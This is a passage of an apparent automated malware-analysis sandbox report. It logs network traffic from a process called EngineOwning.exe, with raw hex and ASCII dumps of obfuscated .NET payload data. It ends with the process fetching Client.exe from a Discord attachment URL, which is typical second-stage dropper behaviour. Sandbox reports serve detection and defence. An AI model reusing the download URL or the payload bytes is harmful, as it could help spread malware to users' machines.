                                                                              2022-04-26 19:08:56 UTC4059INData Raw: 91 c5 80 8e 37 ec 62 6a b1 68 00 07 a2 2d 0c 5c a1 32 a6 b7 fd 88 36 59 a0 8a 7c a9 a3 40 f7 ab dc 53 97 8f f3 73 d7 3a 31 5b c0 82 4e 65 78 6b 9b 80 6c 51 12 7c 8d db bb ab 6f 00 73 fd dd 6d 56 5f f2 41 5b 61 79 e1 7d ad a6 e7 49 1d 87 16 f8 14 38 8d d1 21 32 49 f2 ba 30 00 47 2c 1a 9c b8 54 53 60 6c 1c 81 f8 7a c1 60 44 f2 bc 0e d6 4b e3 cf 31 82 1b c0 a4 bf e2 e2 d0 ae 8a e0 54 7e 37 75 fb 84 c9 74 9f a9 36 52 f1 6c a2 9c b1 43 ab 46 45 82 89 b4 80 25 d3 24 77 5e f5 63 84 6d 94 69 ee 81 d6 48 44 4b 7a 1a 87 44 d5 5f 44 3b 48 96 a0 f6 7e c8 fa f3 ef be cc b6 f0 37 5a 27 0a ec 14 59 c3 7d 8d b2 61 55 6e 07 dc fb c8 3b 60 19 ad b1 76 12 8f bc 87 3f cd f5 b2 78 b1 23 f1 80 81 63 fb 3a f8 ee 17 fa d9 30 16 83 2f 71 03 bd 21 a7 bb f4 89 79 4a db f9 62 b4 81
                                                                              Data Ascii: 7bjh-\26Y|@Ss:1[NexklQ|osmV_A[ay}I8!2I0G,TS`lz`DK1T~7ut6RlCFE%$w^cmiHDKzD_D;H~7Z'Y}aUn;`v?x#c:0/q!yJb
                                                                              2022-04-26 19:08:56 UTC4075INData Raw: b7 75 df 83 23 73 2c 81 2d 79 d6 0d 4f fd 2c 5b 60 e1 32 d5 d8 a4 63 28 bb 7a d5 cb 64 f1 8c ce 6f 72 82 60 bf 6c 6e 92 be 8d 21 98 7f e8 8f ea 3e ed 99 48 1e 69 61 4e cd 90 14 4d 4c 9e 40 a4 8d c2 3a 9c 4c 01 2e 0e 25 8e 70 0b 9e f1 ab 91 b2 5c e5 2d 49 91 da 10 58 76 69 f8 e6 0a 22 b8 9f d5 80 9e 57 bc 85 56 db ec 15 4a cc 89 dd c9 76 df 45 92 68 01 ac 1a db 72 ae 74 dd 7e c7 22 78 af 15 fb ed e2 0f f2 07 6a 91 75 62 63 75 fe 12 b3 e0 9e 23 8c 95 21 88 f3 84 c2 57 3a dc d4 b4 b6 84 a6 c9 01 c4 6e ad dd 38 e1 f7 2a 9b cf 31 0c cc 94 a9 99 e3 44 31 89 91 3d d7 ec 6b 0e fc 45 63 52 b9 92 33 d4 d1 7a c6 7a 16 f6 86 8b 75 ae cb 3b e8 3a 2c 36 ea 4e a3 0a 85 cb 3b 24 3f 18 b0 7f da 8e 88 c8 34 31 6d 4d fa a0 d7 b6 dd be 2e 7c ce 84 e0 eb ae 37 2c 3c 1b 45 04
                                                                              Data Ascii: u#s,-yO,[`2c(zdor`ln!>HiaNML@:L.%p\-IXvi"WVJvEhrt~"xjubcu#!W:n8*1D1=kEcR3zzu;:,6N;$?41mM.|7,<E
                                                                              2022-04-26 19:08:56 UTC4091INData Raw: 11 49 5f 05 5e a6 49 c6 50 ee 53 13 5f a1 df fd fa 6f 4b 57 a0 ba bc b8 3c 13 3f cf 2c 7e 42 32 2d 35 f0 60 ac 9d ce 40 f2 c0 f7 f6 d2 13 64 81 fc 40 52 43 23 a2 2f 13 fe da 3a b8 78 c3 f0 f8 e5 11 b7 fc 99 af c8 2d 6a d0 e1 a5 2d bc 33 af 00 7c a1 a7 b4 16 1f b0 18 2a fc 75 72 e8 71 fb 4c 4a 9d 48 1b 03 cf 81 45 d7 4f b7 5f d4 8f f1 49 6d e3 4f b8 18 c2 9c 83 98 da ae 5c 2b aa 61 1d 31 1a 8c 21 6f d4 c4 ad 87 8b 59 83 d4 2d 29 52 41 60 bf 3e de 1f 41 34 12 a7 c5 8d 57 7b e4 34 d8 c8 f3 89 d6 e3 82 88 c1 3a 0c 38 d6 0c 22 1f 64 f4 61 7b c7 1a f1 29 a6 1f eb 4a 04 8f 2f a1 54 05 47 76 89 f7 3b 91 03 b0 fe 97 6d 35 0c 48 ef aa b7 73 bb 9a e5 81 b8 30 c7 b9 8e 05 f8 12 45 1a 5d 26 29 62 87 13 d0 31 96 c6 e9 3b 59 a8 32 07 f9 6e af 49 87 fa d5 bd 59 1b c3 e0
                                                                              Data Ascii: I_^IPS_oKW<?,~B2-5`@d@RC#/:x-j-3|*urqLJHEO_ImO\+a1!oY-)RA`>A4W{4:8"da{)J/TGv;m5Hs0E]&)b1;Y2nIY
                                                                              2022-04-26 19:08:56 UTC4107INData Raw: 38 37 37 64 18 33 fd 43 51 81 51 b1 a2 02 d3 4b 3b ed 35 a2 7a c1 99 30 d8 78 bf c9 bb c7 94 26 13 d7 36 c2 15 65 9b c1 52 c6 34 89 9f bd 2c 4d a7 50 d8 b8 56 61 71 1f ed a2 80 e8 cd 62 44 8a 3d 54 e7 82 78 e7 4e ab 3d 21 e1 0f bf 04 dd d1 95 e6 13 c8 95 48 4e 82 d6 0f e7 54 21 ad 3c 3e 27 48 79 c9 6a 10 d9 13 90 65 4c d2 3d eb bd 3b e0 97 3c fa 15 87 6d db 0a ea cc e7 00 89 5d 78 2d 50 02 ec 5a 86 98 75 97 35 a5 1f b4 a2 ad d8 90 d5 f6 2e f2 fc b6 70 38 17 cd 56 5e 01 ce 1d 84 6c ec 09 ea 0c 6d 6e 70 26 fc 9f b5 f5 67 8b c8 5d b6 9f b2 ed 59 92 c2 16 7d 0c 11 ae 34 9b 89 d6 29 8c fb 3e b2 14 b9 c1 b9 cc aa ba 9e b5 18 b3 59 fe 53 14 78 21 ed 24 cc ed a0 73 21 73 a7 15 6e 3a 90 d3 77 a5 0d e7 c7 fc a1 26 1a e8 3c 1f 81 1a 9b 5d e3 5c 66 1c 69 6b d6 9b bf
                                                                              Data Ascii: 877d3CQQK;5z0x&6eR4,MPVaqbD=TxN=!HNT!<>'HyjeL=;<m]x-PZu5.p8V^lmnp&g]Y}4)>YSx!$s!sn:w&<]\fik
                                                                              2022-04-26 19:08:56 UTC4123INData Raw: c4 9f ad 76 0f e6 20 40 9d 8e c3 6e 88 82 06 80 1a 54 3b 82 6b 83 2e 3d 54 dd 46 fc bc 79 a1 a6 e7 9d 78 89 b7 f0 3f 05 5f c9 f7 eb de d7 c9 af 72 90 ba 71 e1 0c 78 93 c9 30 28 ed cd 83 69 19 bf 4b ba 93 6b 4e fd ac ce d7 04 d0 4a 93 8a 00 c0 81 c1 f2 19 da 15 bc 08 59 d0 33 3a 65 ad 5c 13 58 d3 e5 af 57 df ca 7b f9 64 01 1f 46 ca d9 df e6 ac 48 bc 41 18 44 4f 5f 6f 11 4c 9a dd ab d0 08 80 ec ae 67 ff eb c5 e8 84 50 f9 54 12 04 c8 59 f8 18 c3 69 e4 68 de 88 77 9b 65 6a 49 bb 67 8b 72 63 b3 71 c3 46 b9 f9 94 51 3a 37 32 05 45 1e c8 40 7f 40 f2 15 b2 d7 bf 9d 1f 1b 67 7d bb fc eb fb 38 97 9a 4d 4c d5 2b 91 fb 56 0c cd d5 77 75 15 4e 43 1c 50 8b df ef 07 c4 c7 6a 7d 46 98 ae 38 5a 7d 1b e2 aa 6f 26 e4 68 9c 85 9a 05 e4 6c 6a da c2 ca eb df 88 30 d3 6f b0 b5
                                                                              Data Ascii: v @nT;k.=TFyx?_rqx0(iKkNJY3:e\XW{dFHADO_oLgPTYihwejIgrcqFQ:72E@@g}8ML+VwuNCPj}F8Z}o&hlj0o
                                                                              2022-04-26 19:08:56 UTC4139INData Raw: 07 1b 05 c1 6c 52 de 72 9c 68 d9 43 b1 49 2f ea 14 46 f9 1f db 32 bd 70 52 68 10 0b 44 b8 1e 9a 87 93 5f 6e 80 d8 28 1f 1f f9 f8 a1 ca e8 2e e5 8b 20 97 bd f9 fd c6 32 23 fc ab 94 f3 0f c1 50 f2 fd dd 50 4d 4f 10 92 58 f8 31 70 94 a8 6e 23 b0 0a 8a b4 4b 6e d7 d4 3d 07 63 88 ae 98 0e 6c 5c 32 bb 16 66 f8 da d4 da 58 0f d3 b0 e4 36 2c 57 b5 2a c1 68 d3 f7 65 96 61 d1 94 13 3c 3d c9 b3 32 15 bb 27 8d f5 8b 01 06 0f 77 39 9e 4a 8a ed 01 e5 89 36 0f 72 4d b0 4e 01 86 8b d5 cd 84 24 d9 e3 11 c1 d5 c6 6b e9 e2 b2 6b d1 6b 1f 19 7b 40 c0 02 4d 3e 05 37 78 a0 cc 77 d2 20 46 fd f1 76 e0 1c 25 85 c9 6f ca ce 48 5e 03 db 5a 51 00 2e f3 1b 0b 4c ee 39 7d a8 27 92 89 fb d1 c7 77 85 66 4e 89 25 2f 1f 7e 78 e7 7d ed 34 e1 12 f9 62 d1 2e 89 c0 ad 8d 0c 7e 92 28 14 1a 00
                                                                              Data Ascii: lRrhCI/F2pRhD_n(. 2#PPMOX1pn#Kn=cl\2fX6,W*hea<=2'w9J6rMN$kkk{@M>7xw Fv%oH^ZQ.L9}'wfN%/~x}4b.~(
                                                                              2022-04-26 19:08:56 UTC4155INData Raw: d4 d5 13 fb 67 04 9a f0 55 a7 c3 a1 ae 2c 57 b4 35 ab 3e 82 18 3e 18 65 5d af 73 04 92 20 10 31 69 62 3e fd 72 92 48 9f 85 2f 26 30 5e 10 42 53 2b 29 6a e1 8f 62 54 03 af 1d e5 ee cb 5b 14 ac 19 ad 88 93 6b e9 a4 12 74 40 59 fc 95 c0 ac 2e 82 c0 40 08 8c 58 41 4b e8 b6 bf 05 37 2c 2d 23 f4 ba 05 bf 33 2a e6 ba 1b 86 1b bc 26 23 e8 e6 1b 0b 18 91 79 e2 5b 6f b0 09 36 10 d0 86 7a 9b 27 69 55 45 ee 36 16 0f db 7c 5b e0 67 63 14 0e 03 ab 8a 78 11 d0 1f ff 3f fd eb 3c b9 27 b5 25 18 1c e5 4e 1e d5 d8 ba 3f 3f 01 af c5 dc d7 88 5d 0a 45 98 a8 c8 f1 94 85 de 3e 83 f5 e3 e6 60 1f c1 6e 0b 0a ff ba 04 0c 23 09 30 66 59 a5 43 7c 6a ae 6a bb 60 7e 22 b8 51 a5 76 cf 48 e3 a8 23 0b aa e3 a4 a5 a6 67 03 88 05 85 1e 6f c5 85 5e b4 92 6c 0a 87 99 aa 57 d3 8e ee 99 c1 ea
                                                                              Data Ascii: gU,W5>>e]s 1ib>rH/&0^BS+)jbT[kt@Y.@XAK7,-#3*&#y[o6z'iUE6|[gcx?<'%N??]E>`n#0fYC|jj`~"QvH#go^lW
                                                                              2022-04-26 19:08:56 UTC4171INData Raw: c6 40 f1 ef a6 f6 46 e2 f2 f1 3b 57 9b 11 7a 58 0e d1 45 31 2a d0 32 9c 66 06 97 2d bd 74 5f fd 98 22 72 0c 80 8c 87 66 f6 5b 02 70 7f 72 d7 1f 40 c9 9f 50 84 8b ae af 1e 86 6f 5b 68 18 57 9e 8c ea f0 ce 60 ec d7 06 d1 1b c3 69 c9 1a 08 b9 b5 70 74 44 0e 73 bb 99 4c 74 c9 b4 0a 3f 85 c3 87 4e e4 05 7d b4 4c 40 e3 48 50 6d 53 54 e8 42 b3 73 51 db 79 e9 65 3a c4 f7 1e 91 d3 68 35 06 9f 71 85 94 e0 a9 69 f8 ed 35 e0 e2 31 13 70 aa 3d e6 d4 18 76 9f d9 66 f3 f0 ed e2 4b 98 4f 10 fc 1e 1b 1c e3 c0 92 0a 7d a5 37 6b 3e 31 b1 1d da 08 7d 68 a9 76 4a a8 38 b0 bf f3 a5 f7 0d 46 76 bb 69 d0 f4 5e be 0a 4d 71 6d c4 4d 42 43 d1 15 83 fb 32 99 ba 3f 47 90 b7 ba 76 e2 c3 74 31 3d 4f 8e 29 9b 00 56 c6 08 67 66 3c 9b c3 4c d5 2c 3c e0 4d b4 0d 8c 13 f6 b0 fc 3a 0c 4b 1f
                                                                              Data Ascii: @F;WzXE1*2f-t_"rf[pr@Po[hW`iptDsLt?N}L@HPmSTBsQye:h5qi51p=vfKO}7k>1}hvJ8Fvi^MqmMBC2?Gvt1=O)Vgf<L,<M:K
                                                                              2022-04-26 19:08:56 UTC4187INData Raw: a2 bb 48 63 66 4d ca 2a a7 cd 53 92 b5 da e1 bd f0 16 f3 86 13 15 b9 a0 03 53 57 79 4d 01 8f a5 b3 da ca 0c 2b 0b 7c 00 db 86 87 ae 6b 11 fd 48 e3 07 6d 50 e8 2b 64 da b2 f9 22 c3 66 b1 46 8d 60 e5 85 88 17 28 fb 74 1b a2 d7 c6 ef ab fb b5 5e 03 52 8e 0e 07 28 ad 34 40 72 98 20 f0 80 50 ad f8 49 f1 d0 5e 1f f0 19 10 e9 50 2a 9d 7d de 84 88 b5 b5 54 9d 75 02 c7 3a 2c a0 ec 21 6e 7f 9b a6 6f a1 85 03 5a 5f bc 3d 6c 81 7b cb 98 66 0b 8d 28 86 5d 54 a6 f7 15 fb f9 40 9b b6 8c fd 79 fb 48 f2 ea b4 d8 fc c0 81 bb 90 86 c3 af f4 0d f4 90 2a 4c ac 2f 2c 01 38 03 8a fe bb f9 06 a7 ba b6 f7 b8 f6 85 02 87 d0 44 95 60 47 69 74 0a ef 74 4a bd b0 ca d5 76 fb 8a 05 8a 24 14 b7 7e c8 21 72 00 75 d6 03 4d 69 e0 0a d7 a3 8b b0 f6 ca 53 29 5b b4 df 8b ec e3 47 44 de 77 b4
                                                                              Data Ascii: HcfM*SSWyM+|kHmP+d"fF`(t^R(4@r PI^P*}Tu:,!noZ_=l{f(]T@yH*L/,8D`GittJv$~!ruMiS)[GDw
                                                                              2022-04-26 19:08:56 UTC4203INData Raw: be de bb 3f b3 f0 0c 53 e0 8d e7 a1 45 f4 7e 0f 53 4b b2 25 13 81 52 eb a9 e0 7d d1 8d 72 d6 e6 03 7d 18 8c be 24 7a 85 2d e3 a8 e4 f3 4a 11 e0 e4 f8 c6 30 85 06 a0 3b 8c 9b e6 73 09 6f c8 1a 4b 73 ff a3 28 d8 f4 f0 47 dd 6f 57 58 aa b7 8d bf 84 07 42 0b 27 d3 80 c0 23 04 0b ef a2 e9 fc 9a d3 5d 22 48 3b c5 01 e0 cb e8 71 39 09 ec 6b 0c 23 49 34 cb 0a 6a c0 35 c1 e5 51 f3 a7 fe d8 27 c4 30 8e e6 a1 89 eb e7 e1 09 3a 4a fc 03 7d ce 92 9e 91 a6 44 1d 39 7c 26 24 1f c7 93 6d a3 75 35 1a c1 7a 92 9b 12 a1 2d de a5 44 41 a1 3c 86 35 9a a3 98 ff 54 83 b5 40 40 96 66 33 c7 3e b2 19 4d 8f 2f d3 28 53 5e 56 ba cc fa 08 2c d3 d4 b0 a9 c4 83 bf 41 54 b3 7d 87 e5 3a e5 65 f1 28 30 ae 4c 9b 17 e6 36 fc 1e e7 05 d6 33 ec 3e 4b aa dc d4 9a 4b 51 63 49 e7 e6 1e ee f8 19
                                                                              Data Ascii: ?SE~SK%R}r}$z-J0;soKs(GoWXB'#]"H;q9k#I4j5Q'0:J}D9|&$mu5z-DA<5T@@f3>M/(S^V,AT}:e(0L63>KKQcI
                                                                              2022-04-26 19:08:56 UTC4219INData Raw: 0a 6c c3 44 8a af d7 b8 9c 02 47 cc 4b 3c d0 d6 ad c9 dc 75 86 6d e4 6d fa 92 59 6d 9d 99 79 de bc 79 99 8f eb c8 b5 22 42 4c 3c 96 a7 17 9f fa f8 77 5e c8 3a 67 a4 12 ec 8d 7d 16 89 67 50 f9 0f c6 20 4a dc b7 c6 b7 8e b5 ac b3 3b a7 be 46 78 b0 c2 97 70 00 6d 15 d9 53 f6 75 ab dd b1 5a e7 1c 78 ce 5c 94 ad 67 1c 13 d0 16 36 24 42 0f b8 6e cc 67 40 cf a1 f4 1b e3 7e 59 d6 f4 f5 d8 7a 86 29 1e fa 35 5e 2e e1 6b 86 2a 43 95 9d 28 ea 79 f4 5d 26 a8 a2 f3 5b 78 c2 59 26 5e d6 fa 86 b3 70 ec a2 d2 3e 8f 10 51 70 56 4e 89 7c 97 12 47 0f 54 53 d1 37 12 ad 03 2a ae 5f 6a 46 ac 30 a0 af 8f c3 1c 72 3e 46 3c 6a a2 f1 63 69 52 47 6a 1b 66 9a e6 28 d5 36 6c d7 a0 ca a6 a5 42 d1 e3 24 eb 1d f6 19 c0 58 13 82 7c 6b 69 2c a5 bd a9 68 9f 28 3c e2 d4 fd 8a 53 63 79 18 cc
                                                                              Data Ascii: lDGK<ummYmyy"BL<w^:g}gP J;FxpmSuZx\g6$Bng@~Yz)5^.k*C(y]&[xY&^p>QpVN|GTS7*_jF0r>F<jciRGjf(6lB$X|ki,h(<Scy
                                                                              2022-04-26 19:08:56 UTC4235INData Raw: ea bf f6 27 49 9d df f6 b4 99 11 26 a5 3a 50 a0 cd a8 73 1c a8 23 5a 4c c1 13 ec e5 14 97 98 d7 22 e7 21 f8 71 b7 45 18 2b 72 66 2c 6b 18 0b 75 b5 b9 4f 50 5f b0 59 26 d2 27 d8 18 55 9c 25 37 2c c3 59 a8 58 6b a0 e2 1f 89 79 54 57 99 83 f8 04 a3 5f f6 b5 59 79 a1 8b df d8 06 ca 1d b1 38 7f e7 c7 c0 cf 39 a5 40 96 6d 21 2e 1d 48 3c e6 98 b4 a3 c8 31 2e f5 56 3e 8e 5e db e0 d9 63 59 c8 6b 69 8d e5 14 5a b1 ca 95 2a 87 f4 f8 6d a3 9a c1 4f 56 73 a4 aa 7c 5e e2 2f 14 75 aa c4 20 f6 39 5f 5f fc 00 e9 e0 c3 68 c7 42 93 92 f2 82 83 49 3c 08 5e 89 81 f0 34 7d 7b 9b 5f 9d 7f 17 be cd a8 ce 39 8d 9a 85 a8 9c 2d 87 a1 5b d9 63 d4 ec 6a 32 06 7d 17 fc d0 77 7c 81 34 87 69 5f 6b 79 69 b8 de a6 17 90 2b 18 cd 02 13 66 06 87 e3 de d2 21 23 14 15 8e 8a 74 5e f1 7d 8f 62
                                                                              Data Ascii: 'I&:Ps#ZL"!qE+rf,kuOP_Y&'U%7,YXkyTW_Yy89@m!.H<1.V>^cYkiZ*mOVs|^/u 9__hBI<^4}{_9-[cj2}w|4i_kyi+f!#t^}b
                                                                              2022-04-26 19:08:56 UTC4251INData Raw: 0b 1c f8 e8 56 f5 ce 57 6d fe 23 bc a1 7b 06 53 36 5b 9f af bd fe eb 99 ea 2f 82 20 d3 3e d9 85 30 f6 29 4c b7 15 a1 1d 44 b4 e3 ad 20 9c 81 71 5f 58 bf 61 78 30 fe 65 16 16 78 9b 1a b6 14 76 39 3d 4b b0 32 09 22 29 07 b4 1f 6d 46 d3 12 2f ed 55 af 9e 7d 5f 01 13 28 5e 21 d7 f4 16 7f 08 3a 3f 38 de 52 b3 81 a6 64 f0 d9 ee 4b 7f 2a 24 63 81 af 95 db 49 b3 37 c2 31 34 43 ec b0 f8 9a e6 df a7 cf 01 72 15 41 46 74 3e 19 c5 33 de 76 81 81 8d 97 e3 0d 20 ed 67 18 03 ec a7 e2 f3 90 29 b6 b9 50 58 cb 10 9b 9b a0 18 32 ca 70 f7 d2 57 2b 46 c5 b7 bb 66 35 c4 50 1a 75 34 b6 f3 b3 69 d6 e0 33 a4 b1 e8 12 76 f9 68 a1 ca a6 37 e9 43 c8 de ee 11 e0 14 33 9c 60 ee 0b c5 1c 25 5a a3 b5 a3 81 91 58 55 5a 50 e1 1e 37 70 25 8b 71 94 4a 0c ea 34 6c 55 18 ff d1 89 17 23 1f 5c
                                                                              Data Ascii: VWm#{S6[/ >0)LD q_Xax0exv9=K2")mF/U}_(^!:?8RdK*$cI714CrAFt>3v g)PX2pW+Ff5Pu4i3vh7C3`%ZXUZP7p%qJ4lU#\
                                                                              2022-04-26 19:08:56 UTC4267INData Raw: bb a2 d4 ca 35 8b 78 07 bd e8 7b 5b 7f 32 bd 12 1d fa d3 9b c0 50 a0 a5 fb f5 c9 d8 bd e2 57 82 a8 00 01 e6 79 62 79 be 91 06 4a d2 a8 b9 27 cc 25 06 fa 26 5a 01 fd 14 22 24 26 e4 04 31 9b 24 d0 f6 0c 4a a8 0d 11 b4 8c e2 a1 93 b6 86 58 e3 54 9d 70 81 4b 9b 19 3c 48 c8 46 6f 7c 39 e8 ba 35 85 42 8a 0a 70 fa c7 3f dd 65 46 cf 9c f2 f1 63 e5 c4 3b 4a b1 a3 73 cb 89 13 bb bd 4d d4 19 67 62 39 86 63 87 3f e7 85 72 01 13 01 9a 6f 75 f6 98 94 a0 d0 c3 9a a0 67 b1 95 db 4a dc 2a 7e 93 52 d7 1b e4 51 b2 fb 0f 25 6c 99 19 9c 0a 5e e5 d0 65 70 ca a4 b1 77 79 03 aa fe 3a dd c3 78 82 4f 16 2c 2e aa 19 36 27 62 ce 41 65 f1 40 18 84 e9 eb 63 c9 de 50 f9 69 10 aa 84 a8 c7 c7 03 35 6a 72 b3 29 a9 11 e9 57 19 5e be 72 d8 33 30 c4 67 0f 20 b0 7a 1e 6e dc 61 a3 bf 4c f0 46
                                                                              Data Ascii: 5x{[2PWybyJ'%&Z"$&1$JXTpK<HFo|95Bp?eFc;JsMgb9c?rougJ*~RQ%l^epwy:xO,.6'bAe@cPi5jr)W^r30g znaLF
                                                                              2022-04-26 19:08:56 UTC4283INData Raw: 56 f0 f5 34 4a 74 bc 8d cb 3e 43 45 60 af 41 0c e9 03 e1 5c ab 53 e8 92 65 37 23 69 12 f8 54 8d c0 e2 c6 46 3e f1 1f b7 2e a0 02 b8 bb d3 e9 ea d7 16 3d 80 23 71 d6 12 b4 a1 69 dd e5 bd 7d 86 83 bd 3e 4a f6 66 88 34 e6 1d ed 82 79 d3 fe 32 11 2c 9c 9e c3 14 95 d0 7e 59 b1 93 2b 20 16 da dc 1d e8 dc 44 1c ca fb 67 27 39 4b 4b a1 84 ef b1 48 2c dc 04 fd 6b af 32 d8 2b 3b a0 ff 79 01 c6 c5 7c ce 8d 17 22 4a ae bf 57 3f 9b e8 bd 78 27 74 08 b4 b4 a2 68 4c 6d 7e 93 d6 46 33 c7 17 f5 41 b2 14 47 1d ea 21 80 4f f2 92 06 91 34 2a c8 0c fc 19 1d 21 25 96 5d 00 e7 7c 91 34 35 3f d9 b5 3c 2c e9 9d bf 7f ff f7 e8 82 4b 01 7c a1 2a c4 d0 f4 dc c5 03 1a 43 de ea 4e 7f 1b db 54 20 0b 55 a4 99 ba 5a 57 94 57 30 33 3d 7a d7 8d 18 cb 48 41 3a 5f ed c2 79 08 29 fa 9a b2 aa
                                                                              Data Ascii: V4Jt>CE`A\Se7#iTF>.=#qi}>Jf4y2,~Y+ Dg'9KKH,k2+;y|"JW?x'thLm~F3AG!O4*!%]|45?<,K|*CNT UZWW03=zHA:_y)
                                                                              2022-04-26 19:08:56 UTC4299INData Raw: 10 59 4b e0 58 13 08 11 39 20 69 b0 07 b7 5a 20 7c ca a6 50 61 38 be ee ff ff 20 d0 02 00 00 13 2d 20 d0 02 00 00 8d 32 00 00 01 25 d0 02 00 00 04 28 0d 00 00 0a 13 2e 11 39 20 58 6d 9a cd 5a 20 99 29 6d 03 61 38 8d ee ff ff 11 09 17 58 13 09 11 09 47 2d 08 20 1c 6c 0f 7d 25 2b 06 20 e9 b9 91 33 25 26 11 39 20 cd 4b ee 1d 5a 61 38 65 ee ff ff 09 11 22 e0 58 11 28 58 11 07 11 28 58 47 52 20 df 7c 9c cd 38 4c ee ff ff 16 13 27 11 39 20 79 f1 6c 60 5a 20 49 2b 3c 3a 61 38 36 ee ff ff 11 09 16 52 20 23 0f 57 e9 38 28 ee ff ff 14 28 0e 00 00 0a 11 39 20 b9 1e 9a bb 5a 20 31 02 9a 33 61 38 0f ee ff ff 11 1e 1f 0c 58 4b 13 21 11 39 20 4c 85 fc 71 5a 20 77 55 00 94 61 38 f4 ed ff ff 11 07 1a 58 20 6c 2e 64 6c 54 11 39 20 d4 71 5f 2c 5a 20 15 e6 f8 83 61 38 d7 ed
                                                                              Data Ascii: YKX9 iZ |Pa8 - 2%(.9 XmZ )ma8XG- l}%+ 3%&9 KZa8e"X(X(XGR |8L'9 yl`Z I+<:a86R #W8((9 Z 13a8XK!9 LqZ wUa8X l.dlT9 q_,Z a8
                                                                              2022-04-26 19:08:56 UTC4315INData Raw: e2 80 ac e2 81 ab e2 80 ae e2 81 ac e2 80 ac e2 80 aa e2 81 ae e2 80 ab e2 80 ab e2 80 ab e2 80 ad e2 81 ab e2 81 af e2 80 8d e2 81 ae e2 80 aa e2 81 ad e2 80 ab e2 80 8d e2 80 8d e2 80 ab e2 80 8f e2 80 8c e2 80 8e e2 80 ac e2 81 af e2 80 ac e2 81 ab e2 80 8f e2 80 ac e2 80 ad e2 81 af e2 81 aa e2 80 ad e2 80 8d e2 80 ae 00 e2 80 ae e2 80 ae e2 81 ab e2 80 ad e2 80 ab e2 80 ab e2 80 ac e2 80 8e e2 80 8b e2 81 ac e2 80 8f e2 80 ab e2 80 aa e2 80 aa e2 81 ab e2 80 8e e2 81 ac e2 80 ab e2 80 8e e2 81 af e2 80 ab e2 80 8b e2 81 aa e2 81 ae e2 80 8f e2 80 8f e2 80 8e e2 81 ad e2 81 aa e2 81 ab e2 81 aa e2 80 8f e2 80 ab e2 81 aa e2 81 aa e2 81 aa e2 80 8f e2 81 ac e2 80 ad e2 80 8d e2 80 ae 00 e2 80 8e e2 80 8c e2 80 ab e2 81 af e2 80 ab e2 80 8e e2 80 8c e2
                                                                              Data Ascii:
                                                                              2022-04-26 19:08:56 UTC4331INData Raw: 80 aa e2 81 af e2 81 ad e2 80 ae e2 80 8c e2 80 8d e2 81 aa e2 81 ac e2 80 ae e2 80 ab e2 80 ac e2 80 aa e2 80 ae e2 80 ac e2 81 aa e2 80 ab e2 80 aa e2 81 ac e2 80 8f e2 80 ac e2 80 ab e2 81 ab e2 80 8e e2 80 ae e2 80 ae 00 e2 80 ad e2 80 8d e2 80 ab e2 81 ae e2 81 aa e2 80 8e e2 81 af e2 80 8c e2 81 af e2 80 8c e2 80 8e e2 80 8f e2 81 af e2 81 ab e2 80 ad e2 80 ad e2 80 8d e2 80 8e e2 80 8d e2 80 8b e2 80 8f e2 81 ac e2 80 8e e2 80 aa e2 80 ad e2 80 ae e2 80 8c e2 80 ae e2 81 ab e2 81 aa e2 80 8d e2 81 ac e2 80 ab e2 80 aa e2 80 8e e2 80 ac e2 81 ae e2 80 ad e2 80 8e e2 80 ae e2 80 ae 00 e2 81 ae e2 80 8d e2 80 8e e2 81 aa e2 80 ae e2 81 ae e2 80 8c e2 80 ac e2 80 ab e2 80 ab e2 80 8d e2 80 8b e2 80 ae e2 81 aa e2 80 ae e2 80 ac e2 80 8c e2 80 ac e2 81
                                                                              Data Ascii:


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              1192.168.2.549745162.159.129.233443C:\Users\user\Desktop\EngineOwning.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              2022-04-26 19:08:57 UTC4340OUTGET /attachments/935712720827842614/966833215883067412/Client.exe HTTP/1.1
                                                                              Accept: */*
                                                                              UA-CPU: AMD64
                                                                              Accept-Encoding: gzip, deflate
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                              Host: cdn.discordapp.com
                                                                              Connection: Keep-Alive
                                                                              2022-04-26 19:08:58 UTC4340INHTTP/1.1 200 OK
                                                                              Date: Tue, 26 Apr 2022 19:08:58 GMT
                                                                              Content-Type: application/x-msdos-program
                                                                              Content-Length: 57856
                                                                              Connection: close
                                                                              CF-Ray: 70219c2e6adf904f-FRA
                                                                              Accept-Ranges: bytes
                                                                              Cache-Control: public, max-age=31536000
                                                                              Content-Disposition: attachment;%20filename=Client.exe
                                                                              ETag: "62d39f4717804ae34f820704722c5284"
                                                                              Expires: Wed, 26 Apr 2023 19:08:58 GMT
                                                                              Last-Modified: Thu, 21 Apr 2022 22:50:01 GMT
                                                                              CF-Cache-Status: MISS
                                                                              Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                              Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                              x-goog-generation: 1650581401614891
                                                                              x-goog-hash: crc32c=rwYvKA==
                                                                              x-goog-hash: md5=YtOfRxeASuNPggcEcixShA==
                                                                              x-goog-metageneration: 1
                                                                              x-goog-storage-class: STANDARD
                                                                              x-goog-stored-content-encoding: identity
                                                                              x-goog-stored-content-length: 57856
                                                                              X-GUploader-UploadID: ADPycdvWN0uVLYglfFceEN5bcI7ATpqTCH2HCmDBP3Y8-vXWZhFU7I2Wm3CmKVm4yH1RKdJN82NkzxL_-mQIAlqofJ3Cxg
                                                                              X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=hN0xwK3BD5G7m3bQIu3SCA%2FBVhKZtJdVoYu0hkkO9OrBMeLpidppoAxPvOPB5TFCQx9HE%2FaWDya49bKl11HtDigHwWeFrGEbQmwOC%2BHShzNU7s9%2FcWKG6ax%2FERRepOPjoNZyrw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              2022-04-26 19:08:58 UTC4341INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                                                                              Data Ascii: Server: cloudflare
